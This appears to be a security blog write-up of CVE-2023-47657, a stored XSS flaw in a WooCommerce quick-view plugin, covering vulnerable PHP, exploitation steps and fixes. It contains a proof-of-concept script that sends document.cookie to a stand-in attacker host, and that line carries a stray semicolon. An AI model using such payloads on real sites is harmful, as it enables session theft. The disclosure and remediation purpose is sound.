CVE-2023-47657 - Authenticated Stored XSS in GrandPlugins Direct Checkout – Quick View – Buy Now For WooCommerce (<= 1.5.8)

WordPress is one of the most widely used platforms for e-commerce sites. It owes much of its functionality to plugins, especially those helping store owners simplify the buying process. However, sometimes these plugins have security holes. One such vulnerability is CVE-2023-47657, a stored Cross-Site Scripting (XSS) bug present in the popular “Direct Checkout – Quick View – Buy Now For WooCommerce” plugin by GrandPlugins, affecting all versions up to 1.5.8.

Let’s break down what this means, why it’s dangerous, and how attackers can exploit it.

What is CVE-2023-47657?

CVE-2023-47657 exposes an authenticated stored XSS vulnerability. If you have an account with "ShopManager" privileges or higher, you can trick your WooCommerce site into saving JavaScript code as part of product data, which will then be served to any admin or customer visiting those pages.

Affected versions: All up to and including 1.5.8

- Plugin page: WordPress.org Plugin Page

How the Vulnerability Works

The plugin does not sanitize certain user input before displaying it on product pages. Specifically, a Shop Manager (or higher-level) user can input arbitrary HTML/JavaScript code in fields like the Quick View Button label or Buy Now Button label. This code gets stored in the database and is then displayed on the frontend for other users and admins.

An attacker with ShopManager privileges could exploit this (for example, in a multi-vendor marketplace), making all visitors to a product page run malicious JavaScript in their browsers. This may allow the attacker to steal cookies, hijack sessions, or perform unwanted actions as users.

Here’s a simplified overview

// Vulnerable code inside plugin (example, simplified)

$button_label = $_POST['quickview_btn_label'];
update_option('quickview_btn_label', $button_label);

// Later, on the product page:
echo get_option('quickview_btn_label');

There’s NO Sanitation or escaping of user input, allowing attackers to store HTML/JS code.

Exploit Example

Step 1: As a user with ShopManager or higher capabilities, navigate to the plugin’s settings.

Step 2: Set the “Quick View Button Label” to contain malicious JavaScript, for example

Quick View <script>alert('XSS');</script>

Step 3: Save the settings.

Step 4: Visit any product page where the Quick View Button appears. The browser will execute the injected <script> code, showing an alert. In a real attack, the code could steal WordPress cookies or perform more damaging actions.

Proof-of-Concept (PoC)

<script>fetch('https://attacker-site.com/log?cookie='; + document.cookie)</script>

*Once saved in the label field, all visitors' cookies will be transmitted to the attacker's server.*

How to Fix

- Update immediately: Upgrade to the latest plugin version (check plugin changelog)
- Sanitize inputs: Plugin authors need to sanitize and escape all user-generated content displayed on the frontend.

Example of safe code

$button_label = sanitize_text_field($_POST['quickview_btn_label']);
update_option('quickview_btn_label', $button_label);

// On output
echo esc_html(get_option('quickview_btn_label'));

References

- Wordfence Threat Intelligence: CVE-2023-47657 Advisory
- Plugin Homepage – GrandPlugins
- NVD: CVE-2023-47657

Conclusion

CVE-2023-47657 is a serious reminder that even functions reserved for trusted users need security checks. Stored XSS can haunt e-commerce stores long after attackers leave, so it’s critical for site owners, developers, and plugin authors to treat all input as untrusted, even from privileged users.

If you use the Direct Checkout – Quick View – Buy Now For WooCommerce plugin, update right away. Audit your team’s privileges, and monitor your site for suspicious behavior.

Timeline

Published on: 11/14/2023 00:15:07 UTC
Last modified on: 11/21/2023 01:31:09 UTC